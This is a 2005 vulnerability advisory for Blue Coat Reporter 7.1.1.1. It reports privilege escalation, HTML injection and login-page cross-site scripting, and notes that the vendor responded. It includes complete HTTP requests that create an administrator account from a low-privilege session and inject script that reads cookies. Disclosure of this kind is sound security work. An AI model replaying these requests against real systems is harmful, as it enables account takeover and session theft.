Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
=============================================
 
Blue Coat Reporter
===============
 
"Blue Coat Reporter 7 provides identity-based reporting on Web communications enabling enterprises to evaluate Web policies and manage network resources more effectively. "
 
Product/Version
=============
 
Blue Coat Reporter 7.1.1.1
Running on Win32
 
Vulnerabilities
===========
 
a) Privilege escalation
 
    A user without administrative privileges is able to create a useraccount with administrative privileges.
 
b) HTML-Code Injection
 
    Unauthenticated users can inject html-code into the application. The code will be executed, if an authenticated user is viewing the affected website.
 
c) Cross Site Scripting at login page
 
    Supplying scriptcode instead of a valid username at the login page will end in a cross site scripting.
 
 
Exploiting
========
 
a) Privlege escalation
 
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account 
3) Sent the following request to create a user hurz with password hurz and admin privileges.
 
 POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
 Referer: http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
 Accept-Language: de
 Content-Type: application/x-www-form-urlencoded
 Proxy-Connection: Keep-Alive
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 Host: 192.168.142.133:8987
 Pragma: no-cache
 Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test; authpassword7=098f6bcd4621d373cade4e832627b4f6
 Content-Length: 170
 
 submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
 
b) HTML-Code Injection
 
POST /?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100
 
volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script>
 
 
c) Cross Site Scripting at login page
 
Supply the following username at the login page:  "/><script>alert("BlueGoat")</script>
 
 
Vendor
======
 
Blue Coat was responding to my message very fast and in a very professional way. Exemplary!
 
Homepage: http://www.bluecoat.com
Advisory: http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
 
Discovered
=========
 
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm